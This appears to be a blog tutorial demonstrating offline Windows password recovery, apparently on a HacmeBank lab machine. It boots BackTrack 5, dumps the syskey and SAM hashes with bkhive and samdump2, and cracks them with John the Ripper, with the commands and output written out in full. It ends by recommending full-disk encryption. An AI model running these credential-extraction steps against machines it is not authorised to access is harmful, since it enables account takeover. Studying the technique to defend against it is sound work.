Simply drop in your backtrack5 CD or USB and boot from the inserted media. Once booted type startx, you can do everything from the console but it’s nicer to have a pretty GUI!

Left click Places at the top and then click on the windows partition you wish to mount.

Then open a terminal and first of all use bkhive to dump the syskey bootkey from the windows hive.

1
2
3
4
5
6
7
8
root@bt:~# bkhive /media/10B9-F2B6/WINNT/system32/config/SYSTEM /root/keyfile.txt
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : $$$PROTO.HIV
Default ControlSet: 001
Bootkey: 7abeb4c282eaef5bfa7a75c197be8f85

The next step is to use the SAM file along with the bootkey to get at the hashes:

1
2
3
4
5
6
7
8
9
10
11
root@bt:~# samdump2 /media/10B9-F2B6/WINNT/system32/config/SAM /root/keyfile.txt | tee hashes.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM
Administrator:500:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ASPNET:1000:b50fd6425ebf847332ada17f89c09dc9:63c184dd474f5d902a830545d9bdcfad:::
IUSR_WEBINSPECT:1001:eeb699201309cb097b3ac7d5e9ecfe77:d61861bf937514d0a6dd9fbf4e7b8376:::
IWAM_WEBINSPECT:1002:7d5621a567c0b5433c884480b718e30a:a4283d74fda5cd3a65641d52873adb78:::

Now that we have the hashes we can start cracking them using bruteforce or wordlist attacks. In this example I will use john the ripper as it’s just a quick demo but you could also use ophcrack to utilise rainbow tables or hashcat to utilise the power of your GPU.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@bt:~# cd /pentest/passwords/john/
root@bt:/pentest/passwords/john# john /root/hashes.txt
Warning: detected hash type "lm", but the string is also recognized as "nt"
Use the "--format=nt" option to force loading these as that type instead
Warning: detected hash type "lm", but the string is also recognized as "nt2"
Use the "--format=nt2" option to force loading these as that type instead
Loaded 9 password hashes with no different salts (LM DES [128/128 BS SSE2])
                 (Guest)
NK               (Administrator:2)
HACMEBA          (Administrator:1)
guesses: 3  time: 0:00:00:39 0.01% (3)  c/s: 173509K  trying: 08529IK - 08527NI
Warning: passwords printed above might be partial
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

Bingo! Looks like we’ve got the first and seconds parts of the 9 character password (which was split into 2 hashes of lengths 7chars and then 2 chars, the whole reason we use passwords of more than 14 characters!)

1
2
3
4
5
6
root@bt:/pentest/passwords/john# john --show /root/hashes.txt
Administrator:HACMEBANK:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::
Guest::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

3 password hashes cracked, 6 left
root@bt:/pentest/passwords/john#

Password = HACMEBANK

So the moral of the story is use full disk encryption to protect this type of attack (and as extra precaution prevent booting of CD, DVD and removable media devices)

Leave a Reply